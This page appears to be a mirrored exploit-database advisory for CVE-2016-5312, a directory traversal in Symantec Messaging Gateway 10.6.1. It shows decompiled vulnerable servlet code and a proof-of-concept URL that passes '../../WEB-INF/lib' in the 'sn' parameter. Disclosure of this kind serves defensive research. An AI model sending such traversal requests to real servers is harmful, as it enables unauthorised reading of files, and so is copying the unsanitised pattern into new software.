Skip to content
cyberexploits
webappmultipletext

Symantec Messaging Gateway 10.6.1 - Directory Traversal

Symantec Messaging Gateway 10.6.1 - Directory Traversal

Publié le 2016-09-28

Code source

Épinglé au commit 7eac4c3a2ce5
textplatforms/java/webapps/40437.txt7eac4c3a
raw
# Title : Symantec Messaging Gateway <= 10.6.1 Directory Traversal

# Date : 28/09/2016

# Author : R-73eN

# Tested on : Symantec Messaging Gateway 10.6.1 (Latest)

# Software : https://www.symantec.com/products/threat-protection/messaging-gateway

# Vendor : Symantec

# CVE : CVE-2016-5312

# Vendor Advisory and Fix: https://www.symantec.com/security_response/securityupdates/detail.jsp?fid=security_advisory&pvid=security_advisory&year=&suid=20160927_00

# 

#  ___        __        ____                 _    _  

# |_ _|_ __  / _| ___  / ___| ___ _ __      / \  | |    

#  | || '_ \| |_ / _ \| |  _ / _ \ '_ \    / _ \ | |    

#  | || | | |  _| (_) | |_| |  __/ | | |  / ___ \| |___ 

# |___|_| |_|_|  \___/ \____|\___|_| |_| /_/   \_\_____|

#

#

# DESCRIPTION:

#

# A charting component in the Symantec Messaging Gateway control center does not properly sanitize user input submitted for charting requests. 

# This could potentially result in an authorized but less privileged user gaining access to paths outside the authorized directory. 

# This could potentially provide read access to some files/directories on the server for which the user is not authorized.

#

The problem relies in the package kavachart-kcServlet-5.3.2.jar , File : com/ve/kavachart/servlet/ChartStream.java

The vulnerable code is

extends HttpServlet {

    public void doGet(HttpServletRequest httpServletRequest, HttpServletResponse httpServletResponse) {

        block6 : {

            try {

                String string = httpServletRequest.getParameter("sn"); 

                //**** Taking parameter "sn" and writing it to the "string variable"





                if (string == null) break block6;

                String string2 = string.substring(string.length() - 3);

                 

                byte[] arrby = (byte[])this.getServletContext().getAttribute(string); 

           

                //**** The string variable is passed here without any sanitanization for directory traversal

                //**** and you can successfully use this to do a directory traversal.

                

                if (arrby != null) {

                    httpServletResponse.setContentType("image/" + string2);

                    ServletOutputStream servletOutputStream = httpServletResponse.getOutputStream();

                    httpServletResponse.setContentLength(arrby.length);

                    servletOutputStream.write(arrby);

                    this.getServletContext().removeAttribute(string);

                    break block6;

                }





POC: 

https://IP-address:PORT/brightmail/servlet/com.ve.kavachart.servlet.ChartStream?sn=../../WEB-INF/lib



Voir sur GitHub